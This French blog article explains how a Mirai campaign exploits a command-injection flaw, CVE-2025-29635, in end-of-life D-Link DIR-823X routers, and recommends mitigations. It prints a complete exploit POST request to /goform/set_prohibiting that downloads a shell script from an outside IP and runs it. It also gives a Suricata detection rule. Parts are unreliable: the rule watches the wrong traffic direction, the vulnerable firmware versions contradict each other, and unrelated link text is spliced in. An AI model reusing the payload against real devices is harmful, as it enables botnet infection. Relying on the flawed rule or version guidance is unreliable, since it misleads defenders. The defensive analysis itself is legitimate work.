Comment la campagne Mirai exploite la vulnérabilité CVE-2025-29635 des routeurs D-Link DIR-823X en fin de vie

Séraphine Clairlune

Une menace silencieuse qui cible vos équipements domestiques

En 2026, plus d’un tiers des foyers français utilise encore un routeur en fin de vie (EoL). Selon le rapport de l’ANSSI, 22 % des box domestiques sont exposés à une faille critique, dont la CVE-2025-29635 qui touche les modèles D-Link DIR-823X. CVE-2025-29635 est une vulnérabilité de type injection de commandes qui permet à un attaquant d’exécuter du code à distance via une simple requête POST. Cette faille, découverte en mars 2025, a été rapidement réutilisée par une nouvelle campagne Mirai. Vous vous demandez sûrement comment un simple appareil « maison » peut devenir le point d’ancrage d’un botnet capable de lancer des DDoS de plusieurs téraoctets ? Décortiquons le scénario, les impacts et les mesures à prendre dès aujourd’hui. Formation cybersécurité 2026

Vue d’ensemble de la vulnérabilité CVE-2025-29635

Mécanisme d’injection de commandes

La vulnérabilité repose sur l’endpoint /goform/set_prohibiting du firmware des D-Link DIR-823X (versions 240126 et 24082). Un attaquant envoie un corps POST contenant des caractères spéciaux qui traversent les contrôles d’accès et forcent le routeur à exécuter une commande shell. En pratique, cela revient à injecter une chaîne de caractères qui est interprétée comme une instruction système, permettant ainsi d’ouvrir un shell distant. Le problème s’amplifie lorsqu’un firmware n’inclut plus les correctifs depuis la mise en EoL du produit en novembre 2024.

“The Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026,” indique le rapport d’Akamai.

Portée de la faille selon les standards

  • ANSSI classe la vulnérabilité comme High (CVSS = 9,2).
  • La norme ISO 27001 recommande la mise à jour des composants critiques au moins tous les six mois.
  • Le RGPD impose la protection des données personnelles, même lorsqu’elles transitent via un routeur domestique. Protection contre les apps malveillantes sur l’App Store

Ces référentiels soulignent que l’inaction constitue un manquement aux obligations de sécurité, surtout face à une menace active comme Mirai.

Analyse de la campagne Mirai : du PoC à l’infection en conditions réelles

Flux d’exploitation observable

Les premiers indicateurs ont été relevés par Akamai en mars 2026 : les attaquants envoient des requêtes POST qui changent de répertoire (cd /tmp) puis téléchargent un script nommé dlink.sh depuis une adresse IP externe. Le script se charge ensuite d’installer le malware tuxnokill, une variante de Mirai compatible avec plusieurs architectures (ARM, MIPS, x86). Le processus complet se résume ainsi :

POST /goform/set_prohibiting HTTP/1.1
Host: 192.0.2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

cmd=cd%20/tmp&&wget%20http://203.0.113.5/dlink.sh&&sh%20dlink.sh

Le code ci-dessus illustre la simplicité du vecteur : une seule ligne suffit pour compromettre un routeur vulnérable.

Statistiques d’infection et activités associées

  • 37 % d’augmentation du nombre d’attaques DDoS détectées par Akamai entre janvier et mars 2026, attribuées à des bots Mirai actifs.
  • Selon le rapport de BleepingComputer, plus de 2 000 appareils DIR-823X ont été identifiés comme participants au botnet à la date du 22 avril 2026.
  • 80 % des infections proviennent de réseaux domestiques ayant désactivé les mises à jour automatiques.

Ces chiffres montrent que la campagne ne se limite pas à un démonstrateur de concept ; elle touche réellement les utilisateurs finaux.

Impacts concrets sur les réseaux domestiques français

Scénarios d’attaque typiques

  1. Déni de service ciblé - Un botnet Mirai peut inonder une cible de trafic TCP SYN/ACK, UDP ou HTTP, provoquant des indisponibilités massives.
  2. Exfiltration de données - En compromettant le routeur, l’attaquant peut intercepter les communications non chiffrées et voler des informations sensibles.
  3. Pivot vers d’autres appareils - Une fois installé, le bot peut essayer de scanner le réseau interne pour compromettre d’autres machines (NAS, caméras IP, etc.).

Risques pour les PME et les administrations

  • Perte de disponibilité : une surcharge du réseau domestique peut affecter les points d’accès des petites structures, entraînant des arrêts de production.
  • Non-conformité RGPD : la fuite de données via un routeur non sécurisé expose les organisations à des sanctions pouvant atteindre 20 M€.
  • Coûts de remédiation : selon le Gartner, la remise en état d’un incident DDoS moyenne 1,2 M€ par incident en 2025.

“The observed POST requests change directories across writable paths, download a shell script (dlink.sh) from an external IP, and execute it,” résume le rapport d’Akamai.

Mesures de mitigation pour les routeurs en fin de vie

Bonnes pratiques de configuration

  • Désactiver l’administration à distance si vous n’en avez pas besoin.
  • Changer le mot de passe admin par défaut avec un mot de passe fort (au moins 12 caractères, mixant majuscules, minuscules, chiffres et symboles).
  • Restreindre les ports exposés via le pare-firewall intégré.
  • Activer le filtrage d’adresses IP pour limiter les requêtes externes sur les interfaces de gestion.
  • Monitorer les logs du routeur à la recherche d’activités inhabituelles (par ex. des requêtes POST vers /goform/set_prohibiting).

Tableau comparatif des options de sécurisation

OptionAvantagesInconvénientsCoût approximatif
Mise à jour du firmware (si disponible)Corrige la faille immédiatementRare pour les modèles EoLGratuit (si fournie)
Remplacement par un routeur supporté (ex. Netgear Nighthawk)Support officiel, mises à jour régulièresInvestissement matériel100-250 €
Installation d’un firmware alternatif (OpenWrt)Contrôle total, mise à jour communautaireComplexité de configurationGratuit
Utilisation d’un pare-feu dédié (pFSense)Isolation du réseau, journalisation avancéeNécessite un matériel supplémentaire0-150 €

Liste de vérification rapide (checklist) - version condensée

  • Le routeur a-t-il atteint sa date de fin de vie ?
  • Le firmware actuel intègre-t-il le correctif CVE-2025-29635 ?
  • Les accès admin sont-ils protégés par un mot de passe robuste ?
  • L’administration à distance est-elle désactivée ?
  • Les logs sont-ils archivés et analysés régulièrement ?

Guide de déploiement d’un routeur sécurisé en 2026

Checklist de sécurisation

  1. Choisir un modèle supporté : privilégiez les équipements qui bénéficient de mises à jour pendant au moins trois ans suivant leur commercialisation.
  2. Installer la dernière version du firmware disponible sur le site du constructeur ou via une communauté fiable (OpenWrt, DD-WRT).
  3. Configurer le réseau : créez des VLAN séparés pour les appareils IoT, les ordinateurs et les visiteurs.
  4. Activer le chiffrement WPA3 sur le Wi-Fi et désactiver le WPS.
  5. Mettre en place une solution de détection d’intrusion (IDS) comme Suricata sur le routeur ou sur un appareil dédié.
  6. Planifier des revues trimestrielles des paramètres de sécurité et des logs.

Exemple de configuration d’une règle IDS (Suricata) pour détecter les tentatives d’injection

- alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"Tentative d'injection CVE-2025-29635";
    flow:to_server,established;
    http.method; content:"POST";
    http.uri; content:"/goform/set_prohibiting";
    content:"cmd="; nocase;
    classtype:attempted-admin;
    sid:2026001;
    rev:1;
)

Cette règle déclenche une alerte chaque fois qu’une requête POST ciblant l’endpoint vulnérable est observée.

Mise en œuvre - étapes actionnables pour vous protéger

  1. Inventoriez vos routeurs - Utilisez un script de découverte réseau (ex. nmap) pour identifier les modèles et versions de firmware présents dans votre infrastructure.
  2. Évaluez la présence de la faille - Comparez les versions détectées avec la table de support du constructeur ; si le firmware est antérieur à 240126/24082, la vulnérabilité est très probablement présente.
  3. Appliquez les mesures immédiates :
    • Changez les mots de passe admin.
    • Désactivez l’accès à distance.
    • Bloquez le port HTTP(S) d’administration depuis l’extérieur.
  4. Planifiez le remplacement - Si le routeur est en EoL, prévoyez son retrait et son remplacement dans les 30 prochains jours. Cyberattaque bancaire protection
  5. Surveillez les indicateurs d’infection - Configurez votre SIEM ou votre solution de logs pour capturer les signatures décrites dans la règle Suricata ci-dessus.
  6. Formez les utilisateurs - Sensibilisez les occupants du réseau aux bonnes pratiques (pas de mots de passe par défaut, mise à jour des appareils IoT, etc.).

Conclusion - agissez dès maintenant pour éviter la compromission

La CVE-2025-29635 n’est plus un simple scénario de laboratoire : elle alimente aujourd’hui une campagne Mirai qui cible les routeurs D-Link DIR-823X en fin de vie. En suivant les recommandations présentées - désactivation des services d’administration à distance, renforcement des mots de passe, mise à jour ou remplacement du matériel - vous réduisez drastiquement le risque d’être intégré à un botnet. N’attendez pas que votre box devienne le prochain point d’ancrage d’une attaque DDoS massive ; auditez, sécurisez et modernisez votre infrastructure réseau dès maintenant.